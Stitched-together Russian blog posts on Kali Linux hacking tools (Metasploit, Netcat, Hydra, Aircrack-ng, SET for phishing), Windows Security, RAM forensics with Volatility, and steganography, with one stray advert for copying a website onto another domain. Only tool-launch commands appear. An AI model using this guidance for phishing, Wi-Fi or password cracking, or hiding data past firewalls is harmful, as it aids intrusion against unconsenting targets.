Загрузите ПК с Kali Linux.

Откройте терминал.

Введите эту команду, чтобы запустить «Wireshark»: wireshark

Загрузите демонстрационный файл «pcapp».

Затем нажмите «Ctrl + 0», чтобы открыть файл «pcapp» в wireshark.

После чего, вы найдете список пакетов и их содержимое.

https://i.gyazo.com/a932ef907964154d1a5bd6dd1301e4b7.png

4. Aircrack NG

Это универсальный анализатор пакетов, взломщик WEP и WPA и инструмент захвата хэша. Aircrack чаще всего используется для взлома Wi-Fi, но на этом его возможности не заканчиваются: вы можете использовать его для захвата пакетов, а также взламывать хэши с помощью различных атак, например, таких как атаки по словарю. Он поддерживает практически все современные беспроводные интерфейсы.

Как использовать Aircrack NG?

Чтобы использовать этот инструмент, выполните следующие действия:

Загрузите машину с Kali Linux.

Откройте терминал.

Введите следующее: aircrack-ng

https://i.gyazo.com/1705e977444beda21ccdb7f6121e0f21.png

5. SET

SET, или Social Engineering Toolkit, представляет собой среду тестирования на проникновение с открытым исходным кодом, предназначенную для социальной инженерии. Он имеет набор инструментов, которые можно использовать для сбора информации о жертве, эксплуатируя и манипулируя человеческой природой. Это также один из лучших инструментов для проведения фишинговых атак.

Как использовать инструмент социальной инженерии?

Чтобы использовать SET, выполните следующие действия:

Загрузите свой ПК с Kali Linux, SET уже предустановлен.

Откройте терминал.

Введите: sudo settoolkit

Вы увидите набор опций, которые вы можете использовать для выполнения своих атак.

https://i.gyazo.com/47e8b331a93efb2b8441d9d8aee1f31d.png

https://i.gyazo.com/2851cc0e7c7996e99a02386e7e2f1996.jpg

Вступить в наш чат

Ищете инструменты, которые смогли бы автоматизировать и облегчить вашу работу? Вы попали точно по адресу, сегодня мы расскажем вам о топовых инструментах, которые способны значительно сэкономить время и порадовать своей эффективностью. Речь пойдет об инструментах, которые предустановлены вместе с Kali Linux. В Kali Linux включено более 500 инструментов, которые могут использоваться для взлома и тестирования на проникновение. Разбегаются глаза от всего этого многообразия? Остановитесь, ведь мы собрали для вас только лучшие из лучших.

Готовы? Тогда поехали!

1. Metasploit

Metasploit — это инструмент с открытым исходным кодом, который является одним из наиболее широко используемых инструментов для тестирования на проникновение во всем мире. В основном, Metasploit - это инструмент командной строки, но он также включает в себя пакет с графическим интерфейсом, известный как «Armitage», что делает его использование более удобным и продуктивным. Этот инструмент содержит большое количество эксплойтов для тестирования уязвимостей сети или операционной системы.

Как использовать Metasploit?

1. Загрузите ПК с Kali Linux.

2. Откройте терминал.

3. Для запуска «Metasploit» введите: msfconsole

https://i.gyazo.com/e492031326a93b46709e0cab4e4bd79d.jpg

2. Netcat

Netcat, также известный как NC, представляет собой сетевой инструмент, который выполняет сканирование портов, передачу файлов и получает данные о хосте. Netcat использует порты TCP или UDP. Также его называют «швейцарским ножом хакера», поэтому его всегда стоит иметь под рукой.

Как использовать Netcat?

1. Загрузите ПК с Kali Linux.

2. Откройте терминал.

3. Введите: sudo nc или sudo netcat

https://i.gyazo.com/2d7c2bf9a45f1b12def266c0101b2c2b.jpg

3. *****

***** поддерживает огромное количество служб, благодаря своей быстроте и надёжности этот инструмент заслуживает вашего внимания. ***** подбирает пароли методом брутфорса к более чем 30 протоколам, включая telnet, ftp, http, https, smb и т.д.

Как использовать Гидру?

1. Загрузите ПК с Kali Linux.

2. Откройте терминал.

3. Введите: sudo *****

https://i.gyazo.com/62677847658287c454fc24406c34fdbd.jpg

4. John The Ripper

John The Ripper или Джон Потрошитель — это инструмент с открытым исходным кодом, используемый для взлома паролей во время тестирования на проникновение. JTR (John The Ripper) доступен не только для Linux, но и для различных других операционных систем.

Его основным предназначением является аудит слабых паролей методом перебора. Он имеет свои собственные словари возможных паролей, доступные на 20 языках. Эти словари предоставляют большое количество возможных паролей, из которых можно создать хеш-значения, чтобы угадать целевой пароль. Поскольку использование одного и того же пароля на большинстве сайтов стало тенденцией, взлом одного пароля чаще всего становится ключом от всех дверей. Этот инструмент сначала шифрует данные, а затем проверяет совпадение хеш-значений; если проверка закончится успешно - у вас есть пароль; если нет, то проверка будет продолжена.

Как использовать Джона Потрошителя?

1. Загрузите ПК с Kali Linux.

2. Откройте терминал.

3. Введите: sudo john.

https://i.gyazo.com/7b30855fd76f235023206d6faf9fcf68.jpg

5. SQL Map

SQL Map — это инструмент с открытым исходным кодом, используемый при тестировании на проникновение для обнаружения и использования бреши «SQL Injection». Эти атаки могут получить контроль над базой данных, использующей SQL, и они могут повлиять на любое веб-приложение или веб-сайт, к которому подключена база данных SQL.

Базы данных SQL включают mySQL, SQL Server, Oracle и многие другие, и они содержат конфиденциальную информацию, которая в случае утечки повлияет на многих пользователей. Поэтому для поиска и защиты от этих уязвимостей как нельзя более кстати приходится SQLMap.

Как использовать SQLMap:

1. Загрузите ПК с Kali Linux.

2. Откройте терминал.

3. Введите: sudo sqlmap

https://i.gyazo.com/95bdcb10b78b9bdf987b44243d3976c5.jpg

Заключение:

Если вы хотите стать экспертом по кибербезопасности, вы должны хорошо знать Kali Linux и его инструменты. Знание и умение пользоваться инструментами поможет вам в решение многих задач, будь то сбор информации, тестирование на проникновение, фишинг, взлом или что-то еще.

Это лишь неполный список инструментов, необходимых для того, чтобы лучше освоить Kali Linux. Мы надеемся, что вы узнали из этой темы об инструментах, о которых раньше не догадывались. На этом все. Удачи!

Заказ - копирование сайта и настройка на свой домен с подключением панели админа.

https://i.gyazo.com/64605bf91d40c7e0599a5052aa0bf261.jpg

Вступить в наш чат

Достаточно ли эффективна система безопасности Windows, чтобы защитить вас от вредоносных программ и вирусов? Чтобы ответить на этот вопрос, давайте изучим «Безопасность Windows» и посмотрим, что она делает.

Итак, давайте начнем.

https://i.gyazo.com/9f64c5796d91aade3fc2e92892369dc6.jpg

Безопасность Windows

Если раньше большинство пользователей скептически относились ко встроенной защите Windows, то сейчас же их мнение изменилось.

За последнее время многие технические обозреватели дали Windows Безопасности положительную оценку за быстрое обнаружение и остановку вирусов и вредоносных программ, более того некоторые даже оценивают ее выше, чем платные антивирусные программы.

https://i.gyazo.com/339558663299c2777c8e31a5e5bd99ec.jpg

Как же Windows удается добиться такой высокой защиты? Все дело в двух подходах, которые она задействует.

Во-первых, Windows проверяет подписи в базе данных. Microsoft несколько раз в день публикует обновления для ПК с сигнатурами вирусов, после чего служба безопасности Windows загружает эти сигнатуры и сравнивает их с возможными угрозами.

Второй подход — использование «эвристики». Это означает, что Windows анализирует поведение программы без использования конкретных определений или сигнатур. Таким образом, если уязвимость нулевого дня или необнаруженная угроза проникнет в вашу систему Windows, то Безопасность Windows скорее всего заблокирует её, даже если ранее она никогда не была замечена.

https://i.gyazo.com/eb5b8f3d9145c4274cbd37d6aadea5a8.png

Результаты сравнительного теста AV

Уязвимости Безопасности Windows

Безопасность Windows довольно эффективна для обычных пользователей, но все же имеет некоторые уязвимости. Например, она довольно сильно зависит от возможности подключения к серверам Microsoft и доступа к данным о вредоносном ПО, хранящимся в облаке. Недавний сравнительный тест AV показал, что Безопасность Windows обнаружила только 2/3 угроз при потере подключения к Интернету, что отстает от большинства платных конкурентов, которые хранят большую часть своих ресурсов локально.

Конечно, вы сейчас скажете, что мы все время проводим онлайн, но вы только представьте ситуацию, что вы по незнанию загрузили вредоносное ПО, а затем оно решило действовать именно в тот момент, когда вы не были подключены к сети, потому что забыли заплатить за Интернет или у вас отключили электричество.

Кроме того, популярные платные антивирусы предоставляют вам дополнительные функции, такие как VPN или мониторинг вашей домашней сети на наличие уязвимостей, чем Windows, к сожалению, не может похвастаться.

Безопасность конечных точек

Конечные точки — это устройства, которые подключаются к вашей сети и обмениваются с нею данными. Например, это могут телефоны, наушники, колонки и т.д. Когда устройство (например, ноутбук) подключается к сети, поток информации между ними во многом напоминает разговор между двумя собеседниками по телефону.

Киберпреступники выбирают конечные точки для атак, поскольку они позволяют получить доступ к основному устройству и являются более уязвимыми по своей природе. Именно по этим причинам безопасность конечных точек крайне важна.

В наши дни безопасность конечных точек обеспечивается растущим числом компаний, таких как «CrowdStrike», «HP Wolf Security», «Central 1», «FireEye» и даже «Microsoft».

Но при этом защита должна включать в себя не только обычные функции антивируса от вредоносных программ, но и расширенные функции:

автоматическое восстановление BIOS системы в случае атаки;

более тщательное изучение файлов для обнаружения вредоносного кода;

изолированность процессов в памяти, чтобы вредоносное ПО не могло распространиться на другие части системы;

поддержание работы программного обеспечения безопасности с аппаратным контролем, даже если операционная система скомпрометирована.

Заключение

Безопасность Windows совершенствуется и развивается на глазах. Еще недавно никто и подумать не мог, что Microsoft встанет в одном ряду с популярными антивирусными программами по уровню защиты и безопасности. Если вы являетесь обычным пользователем ПК, память которого не заполнена жизненно важными файлами, которые нельзя скомпрометировать любой ценой, то продолжайте, как и раньше, использовать Windows. Но даже несмотря на хорошую защиты, все же не стоит пренебрегать антивирусом, который лишь усилит сохранность и безопасность вашей системы.

https://i.gyazo.com/ce03a7087d09e93c7acdbc56543a48dd.jpg

Вступить в наш чат

Вы когда-нибудь задумывались, что может случиться, если ваш компьютер попадает в чужие руки? А вы знали, что даже выключенный ПК может рассказать много неожиданных вещей, как о себе, так и о его владельце? Все дело в оперативной памяти, которая некоторое время хранит информацию.

Наряду с ростом кибератак повышается необходимость быстро находить и устранять угрозу. В этой деле поможет криминалистика оперативной памяти. Если ваш компьютер подвергся взлому, а вы даже об этом не догадывались — анализ памяти это покажет.

В этой статье мы расскажем:

Что такое криминалистика оперативной памяти?

Важна ли криминалистика RAM?

Как создать дамп памяти системы.

Что такое Volatility?

Как использовать Volatility.

Итак, поехали.

https://i.gyazo.com/e5963915a39cb98a17ed4211aafe6eab.jpg

Криминалистика оперативной памяти

Криминалистика оперативной памяти — это процесс анализа содержимого энергозависимой памяти (ОЗУ) компьютера с целью выявления последней активности и любых вредоносных вторжений. Энергозависимая память временно хранит данные, поэтому она может предоставить ценную информацию о том, что происходило на компьютере в последнее время. Вы, возможно, удивитесь, но в ней какое-то время хранится очень много всего интересного: сообщения; комментарии, оставленные на форумах; информация о последних скаченных файлах; картинки; страницы веб-сайтов; ключи, с помощью которых можно расшифровать содержимое криптоконтейнеров и многое другое. А если ваш ПК был заражен вирусом или подвергся взлому, то это тоже станет известно с помощью криминалистического анализа оперативной памяти.

https://i.gyazo.com/5ce76be21d2388495bc17c7bbe28c26f.jpg

Важна ли криминалистика RAM

На этот вопрос есть простой ответ: да!

Криминалистика оперативной памяти очень важна, поскольку она позволяет обнаруживать и предотвращать кибератаки в режиме реального времени. В отличие от традиционных методов судебной экспертизы, которые анализируют данные, уже записанные на диск, криминалистика RAM анализирует только те данные, которые используются в данный момент.

Это означает, что вы можете быстро и эффективно находить любые вредоносные программы и вирусы и предпринимать необходимые шаги для предотвращения дальнейшего ущерба.

Как создать дамп памяти системы

Для того, чтобы начать работу с оперативной памятью, нам нужно создать дамп памяти компьютера. Для этого мы будем использовать инструмент под названием «DumpIt».

https://i.gyazo.com/f67c075f018d74b20d8c518ee7643840.png

Когда мы говорим «память», то имеем в виду оперативную или энергозависимую память, в которой хранятся все запущенные в данный момент процессы или программы. Основная идея заключается в том, что если в системе есть какие-либо вирусы или вредоносные программы, то они обязательно себя покажут.

Скачайте и запустите программу, после запуска «DumpIt» запросит подтверждение на получение доступа ко всем данным, которые в настоящее время работают на вашем ПК, и затем сохранит их в виде файла.

Кроме того, следует упомянуть еще один инструмент — «FTK Imager», бесплатный криминалистический инструмент. Он также позволяет анализировать память.

Поэтому, если по какой-либо причине «DumpIt» не дает вам нужного результата или вы столкнулись с некоторыми ошибками, вы можете использовать один из этих инструментов: диспетчер задач Windows, инструмент SysInternals, RAM Capture и FTK Imager.

https://i.gyazo.com/6a69a3de4a3537cb662a2ec8395cc1de.jpg

FTK Imager

Что такое Volatility

https://i.gyazo.com/75dc2e0176e73338c259397476ebea97.png

Volatility — это платформа с открытым исходным кодом, которую можно использовать для проведения криминалистической экспертизы оперативной памяти на компьютере. Это отличный инструмент для анализа дампов памяти, который поможет вам определить, был ли взломан ваш компьютер.

Как использовать Volatility

Теперь, когда файл выгружен мы можем начинать анализ с помощью инструмента с открытым исходным кодом Volatility:

Загрузите и установите последнюю версию Volatility с официального сайта.

Определите профиль. Чтобы правильно определить профиль для анализируемого дампа памяти, запустите команду «imageinfo».

Проанализируйте дамп памяти. После того, как вы определили профиль, вы можете начать анализ дампа памяти, используя различные плагины, предоставляемые Volatility. Некоторые распространенные плагины включают pslist, psscan и netscan, которые предоставляют информацию о запущенных процессах, сетевых подключениях и другую системную информацию.

Изучите результаты. Программа выдаст вам результаты анализа, которые скажут, был ли ваш компьютер взломан или нет.

Заключение

Компьютерная криминалистика — мощный инструмент для обнаружения и предотвращения кибератак. Используя Volatility для проведения криминалистического анализа оперативной памяти на вашем ПК, вы можете быстро и эффективно обнаружить любые признаки вредоносной активности и предпринять необходимые шаги для предотвращения дальнейшего ущерба. Таким образом, если вы подозреваете, что ваш компьютер был взломан, проведите криминалистический анализ, чтобы предотвратить кибер-угрозы.

https://i.gyazo.com/165fbd4311430e1a26e47908167c12ba.jpg

Вступить в наш чат

Еще с древних времен люди задавались вопросом, как зашифровать послание и утаить его от посторонних глаз. С тех пор методы и способы защиты изменились, но суть осталась неизменной. Когда речь заходит о надежной защите файлов и информации, то в дело вступает стеганография. С помощью нее вы можете спрятать свои конфиденциальные файлы в аудио- и видеозаписях или изображениях.

В этой статье вы узнаете:

Что такое стеганография?

Зачем использовать стеганографию?

Как использовать стеганографию?

Как скрыть секретную информацию в изображении?

Как скрыть секретную информацию в аудиофайле?

https://i.gyazo.com/00bd77b40ef3d9aadbdc86391fd467b5.jpg

Что такое стеганография

Слово «стеганография» происходит от греческих слов steganos (секрет, тайна) и graphy (запись) и дословно переводится как «тайнопись».

Стеганография — это метод сокрытия секретных данных в другом файле, таком как изображение, аудио- или видеозапись.

Цель стеганографии — спрятать конфиденциальную информацию и, таким образом, защитить её от третьих лиц.

В отличие от шифрования, которое лишь защищает файлы с помощью ключа, стеганография скрывает сам факт их существования.

Зачем использовать стеганографию?

Причин для использования стеганографии очень много, но основная — это маскировка личных данных и защита конфиденциальной информации.

Стеганография подразумевает хранение секретных файлов на видном месте. Люди маскируют важные данные под, казалось бы, обычный файл, такой как фотография или аудиозапись, чтобы сделать их незаметными для других. Скрывая данные в другом файле, стеганография обеспечивает дополнительный уровень безопасности.

Стеганографию также можно использовать для обхода брандмауэров и других мер безопасности, которые могут блокировать или ограничивать передачу определенных типов файлов.

Как использовать стеганографию?

Чтобы использовать стеганографию, в первую очередь нам понадобится любой файл-обманка, такой как изображение или аудиозапись и программа для стеганографии.

После чего мы закодируем наши секретные данные в файл-обманку, что приведет к созданию нового файла, содержащего исходный файл и наши скрытые данные. Теперь, если мы хотим получить доступ к секретным данным, мы просто используем программу стеганографии для декодирования файла, где вводим пароль, который установили в процессе кодирования. Если пароль совпадет, то секретные данные будут извлечены и доступны для вас.

Как скрыть секретную информацию в изображении?

Существует несколько инструментов для сокрытия секретной информации в изображениях с помощью стеганографии. Вот несколько популярных инструментов, которые помогут вам в этом:

OpenStego:

Это бесплатный инструмент стеганографии с открытым исходным кодом, который поддерживает широкий спектр форматов изображений и аудио.

QuickStego:

Удобный инструмент стеганографии, который позволяет скрывать текст или файл внутри изображения.

SteganoGraph:

Он поддерживает несколько форматов файлов изображений и включает в себя такие функции, как шифрование и защита паролем.

F5 Steganography:

Инструмент использует специальную комбинацию для защиты, чтобы данные были хорошо скрыты и поддерживает различные форматы изображений.

Steg:

Инструмент стеганографии на основе командной строки, где вы также можете найти большое количество доступных форматов файла.

Вы можете выбрать для себя любой из этих инструментов, но мы же покажем, как работает стеганография на примере «OpenStego версии-0.8.6».

https://i.gyazo.com/b986e8dcc8701e02132989671665f38a.png

Итак, чтобы скрыть секретную информацию в изображении с помощью «OpenStego», выполните следующие действия:

Скачайте файл изображения, который будет служить обложкой для нашего секретного файла. Во втором поле вставьте путь к файлу обложки;

Затем скопируйте путь к секретному файлу и вставьте его в первое поле;

В третьем поле от вас требуется указать место, где вы сохраните зашифрованный файл;

Выберите алгоритм шифрования или оставьте исходный AES128;

Придумайте и запомните пароль, которые вы будете вводить каждый раз, чтобы получить доступ к секретному файлу.

Извлечение данных

https://i.gyazo.com/f97ef9ab9a0c1fe26d2e236744ad4d74.png

Извлечение данных не составит трудностей; вам просто нужно запомнить путь к изображению, в котором вы скрыли ваши данные.

После чего выберите папку, в которую вы хотите извлечь скрытые файлы, и вставьте путь во второе поле. Наконец, вы должны ввести пароль, который вы использовали для скрытия данных и нажать «Извлечь данные». Вы закончили извлечение скрытых файлов из картинки.

Как скрыть секретную информацию в аудиофайле?

Вы можете использовать различные инструменты, чтобы скрыть секретную информацию в аудиофайле. Сейчас мы расскажем вам о лучших из них:

OpenStego:

Это бесплатный инструмент с открытым исходным кодом, который поддерживает несколько форматов аудиофайлов и предоставляет удобный интерфейс для сокрытия и извлечения секретной информации. Его же мы использовали и для сокрытия информации в изображении.

Audio Steganography:

Бесплатный инструмент для стеганографии аудио, который можно использовать для сокрытия секретной информации в аудиофайлах WAV.

MP3Stego:

Это бесплатный инструмент, который можно использовать для сокрытия секретной информации в аудиофайлах MP3.

DeepSound:

Хотя этот инструмент является платным, он имеет ряд расширенных возможностей для засекречивания вашей личной информации.

Выбирайте любой инструмент на свое усмотрение, а мы же будем использовать «DeepSound2.0».

https://i.gyazo.com/0673a5b83c5f0fc7848d93e6bef136ba.jpg

Выполните следующие шаги, если вы используете «DeepSound2.0», если же у вас другой инструмент, то все равно ознакомьтесь с пунктами, написанными ниже, так как последовательность их выполнения зачастую совпадает.

Вам понадобится аудиофайл, который будет служить прикрытием для вашего секретного файла. Для этого выберите аудио с помощью кнопки «Open carrier files».

Затем нажмите кнопку «Add secret files» и добавьте свои секретные файлы.

Далее ищем кнопку с надписью «Encode secret files» и нажимаем ее. После этого появится окно, одетая сможете выбрать желаемый формат аудио или же оставить как есть.

Обязательно добавьте пароль; для этого вам нужно поставить галочку рядом с «Encrypt secret files (AES 256)».

Затем введите свои пароли нажмите кнопку «Encode secret files».

Теперь вы успешно закодировали свои секретные файлы внутри выбранного аудио.

https://i.gyazo.com/2eb59f83e6e4fa899ea0c29a8ab075b2.png

Извлечение данных

Для извлечения данных вам потребуется выбрать зашифрованный аудиофайл, нажав кнопку «Open carrier files». Как только вы откроете зашифрованный файл, он запросит пароль.

https://i.gyazo.com/4a731e8d58e8da9c99880f1fb5e6a395.png

После того, как вы введете правильный пароль, вы увидите кнопку «Extract secret files», нажмите на неё.

Поздравляем, вы научились прятать и извлекать свои секретные файлы из картинки и аудиофайла!

Заключение

Стеганография — мощный инструмент для сокрытия секретных файлов и защиты конфиденциальной информации.

Используя файл-обманку и специальный инструмент для стеганографии, вы можете кодировать свои секретные данные и хранить их на видном месте, не вызывая никаких подозрений. Независимо от того, хотите ли вы защитить личные данные от взора близких, бизнес отчеты или финансовые данные, стеганография поможет сохранить вашу информацию в безопасности.